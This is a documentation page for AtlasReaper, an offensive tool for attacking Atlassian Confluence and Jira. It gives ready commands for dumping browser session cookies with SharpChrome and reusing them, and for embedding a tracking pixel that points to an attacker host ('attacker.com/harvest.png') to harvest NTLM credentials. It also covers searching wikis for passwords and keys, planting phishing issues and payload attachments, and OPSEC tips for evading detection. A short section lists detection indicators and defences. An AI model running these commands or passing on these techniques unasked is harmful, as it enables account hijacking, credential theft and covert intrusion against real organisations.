Skip to main content

What is AtlasReaper?

AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira platforms. It provides various features helpful for credential farming, social engineering, and information gathering in Atlassian environments.
Written in C# by @werdhaihai

Key Features

Confluence Reconnaissance

Search, enumerate, and interact with Confluence spaces, pages, and attachments

Jira Operations

Create issues, add comments, manage attachments, and enumerate projects

Credential Farming

Embed 1x1 pixel images to perform credential harvesting attacks

Cookie-Based Auth

Uses browser session tokens for authentication

Anonymous Access

Supports anonymous access when configured

Social Engineering

Create issues, add comments, and embed content for social engineering

Command Structure

AtlasReaper uses a hierarchical command structure: 
AtlasReaper.exe [command] [subcommand] [options]

Available Commands

  • Confluence
  • Jira
  • Common
Confluence operations:
  • attach - Attach files to pages
  • download - Download attachments
  • embed - Embed 1x1 pixel images (credential farming)
  • link - Add links to pages
  • listattachments - Enumerate attachments
  • listpages - Enumerate pages
  • listspaces - Enumerate spaces
  • search - Search content with wildcard support

Authentication

Session Token Authentication

AtlasReaper supports cookie-based authentication using session tokens from user browsers:
1

Extract Session Tokens

Use SharpChrome or similar tools to dump cookies:
SharpChrome.exe cookies /showall
2

Locate Atlassian Cookies

Look for cookies scoped to *.atlassian.net:
  • cloud.session.token
  • tenant.session.token
3

Use in Commands

Provide the cookie value via the --cookie option:
AtlasReaper.exe [command] [subcommand] --cookie $cookie --url $url

Anonymous Access

If Confluence or Jira allows anonymous access, you can omit the cookie parameter: 
AtlasReaper.exe confluence listspaces --url https://example.atlassian.net
Test for anonymous access by running commands without the --cookie parameter.

Use Cases

Reconnaissance Scenarios

Objective: Enumerate available resources and gather intelligence
  • List all Confluence spaces and pages
  • Enumerate Jira projects and issues
  • Search for sensitive information (credentials, keys, internal URLs)
  • Download attachments containing valuable data
  • Enumerate user lists for social engineering
Objective: Harvest credentials via embedded content
  • Embed 1x1 pixel images pointing to attacker-controlled servers
  • Monitor for authentication attempts (NTLM hashes)
  • Leverage Responder or similar tools to capture credentials
  • Target high-traffic pages for maximum exposure
Objective: Manipulate users for further access
  • Create legitimate-looking Jira issues
  • Add comments with malicious links
  • Attach seemingly benign files with payloads
  • Link to external resources for phishing
  • Impersonate legitimate workflows
Objective: Expand access within the organization
  • Search for internal URLs and endpoints
  • Enumerate API keys and tokens in documentation
  • Identify VPN configurations and access methods
  • Discover internal tools and services
  • Map organizational structure via user enumeration

Quick Start Examples

Confluence Operations

# List all spaces
AtlasReaper.exe confluence listspaces --url https://company.atlassian.net --cookie $cookie

# Search for sensitive information
AtlasReaper.exe confluence search --query "password*" --url $url --cookie $cookie

# Search for URLs with wildcard
AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie

# List pages in a space
AtlasReaper.exe confluence listpages --space-key "DOCS" --url $url --cookie $cookie

# Download an attachment
AtlasReaper.exe confluence download --attachment-id "12345" --output "file.pdf" --url $url --cookie $cookie

# Attach a file to a page
AtlasReaper.exe confluence attach --page-id "12345" --file "document.pdf" --url $url --cookie $cookie

# Embed 1x1 pixel for credential farming
AtlasReaper.exe confluence embed --page-id "12345" --image-url "http://attacker.com/harvest.png" --url $url --cookie $cookie

Jira Operations

# List all projects
AtlasReaper.exe jira listprojects --url https://company.atlassian.net --cookie $cookie

# List issues in a project
AtlasReaper.exe jira listissues --project "PROJ" --url $url --cookie $cookie

# Search for issues
AtlasReaper.exe jira searchissues --query "security" --url $url --cookie $cookie

# Create a new issue
AtlasReaper.exe jira createissue --project "SUPPORT" --issue-type "Task" --message "Need access to VPN" --url $url --cookie $cookie

# Add a comment to an issue
AtlasReaper.exe jira addcomment --issue-key "PROJ-123" --comment "Please see attached" --url $url --cookie $cookie

# Attach a file to an issue
AtlasReaper.exe jira attach --issue-key "PROJ-123" --file "report.pdf" --url $url --cookie $cookie

# List users (for enumeration)
AtlasReaper.exe jira listusers --url $url --cookie $cookie

Operational Workflow

Initial Reconnaissance

Credential Farming Attack

Detection Considerations

AtlasReaper activities can be detected by security monitoring tools and logging systems.

Detection Indicators

API Activity:
  • Unusual API request patterns
  • Rapid enumeration of resources
  • Anonymous access attempts (if disabled)
  • Session token usage from unexpected locations
  • File upload/download patterns
User Behavior:
  • Multiple page/issue creations from single account
  • Embedding of external images
  • Mass attachment downloads
  • Unusual search queries (wildcards, sensitive terms)
  • Comment spam or phishing attempts
Network Indicators:
  • Connections to unknown external image hosts
  • Outbound authentication attempts
  • UNC path connections (for credential harvesting)

Defensive Recommendations

  • Monitor Confluence/Jira audit logs for suspicious activity
  • Alert on anonymous access attempts (if disabled)
  • Track API usage patterns for anomalies
  • Monitor for external image embedding
  • Detect mass enumeration attempts
  • Watch for unusual session token usage patterns
  • Alert on file downloads from sensitive spaces
  • Disable anonymous access if not required
  • Implement strict session token policies
  • Use IP allowlisting for Atlassian access
  • Enforce MFA for all users
  • Restrict permissions for space/project creation
  • Block external image embedding
  • Implement DLP for sensitive content
  • Regularly audit user permissions

Architecture

Target Platforms

Confluence

  • Confluence Cloud (*.atlassian.net)
  • Self-hosted Confluence (server/data center)
  • Anonymous and authenticated access
  • REST API interactions

Jira

  • Jira Cloud (*.atlassian.net)
  • Self-hosted Jira (server/data center)
  • Issue tracking and project management
  • User enumeration capabilities

Authentication Flow

Limitations

Be aware of the following limitations when using AtlasReaper:
  • Testing Coverage: Not thoroughly tested in all environments - unexpected behavior may occur
  • Authentication Methods: Only supports cloud.session.token or tenant.session.token from browsers
    • API tokens not currently supported
    • Personal access tokens not supported
    • OAuth not supported
  • Attribution: Write operations (create/comment/attach) will be attributed to the session token’s user or “anonymous”
  • Rate Limiting: May encounter API rate limits during aggressive enumeration
  • Error Handling: Some edge cases may cause crashes or unexpected behavior

OPSEC Considerations

  • Attribution: All actions are logged under the session token’s username
  • Timing: Space out requests to avoid detection
  • Volume: Limit enumeration to avoid triggering alerts
  • Content: Craft believable issues/comments for social engineering
  • Cleanup: Consider removing embedded content after farming
  • Use HTTPS for harvesting server (avoid cleartext)
  • Host harvesting infrastructure on legitimate-looking domains
  • Employ logging and monitoring of incoming connections
  • Use short-lived campaigns to minimize detection window
  • Clean up embedded images after successful harvest
  • Session tokens may expire or be revoked
  • Multiple concurrent uses may trigger anomaly detection
  • Original user may notice unusual activity
  • Session tokens typically tied to IP address
  • Consider token rotation if available

Command Reference

Confluence Commands

CommandDescription
attachAttach a file to a Confluence page
downloadDownload attachments from Confluence
embedEmbed 1x1 pixel image for credential farming
linkAdd a link to a Confluence page
listattachmentsList attachments on a page
listpagesList pages in Confluence spaces
listspacesList all Confluence spaces
searchSearch Confluence content with wildcards

Jira Commands

CommandDescription
addcommentAdd a comment to a Jira issue
attachAttach a file to a Jira issue
createissueCreate a new Jira issue
downloadDownload attachments from an issue
listattachmentsList attachments on an issue
listissuesList issues in Jira projects
listprojectsList all Jira projects
listusersList Atlassian users
searchissuesSearch Jira issues

Additional Resources

Blog Post

Sowing Chaos and Reaping Rewards in Confluence and Jira

GitHub Repository

Official AtlasReaper repository

Usage Guide

Practical usage examples

Contributing

If you encounter issues or have suggestions:
  • Submit a pull request
  • Open an issue on GitHub

Author

AtlasReaper is developed by @werdhaihai at SpecterOps.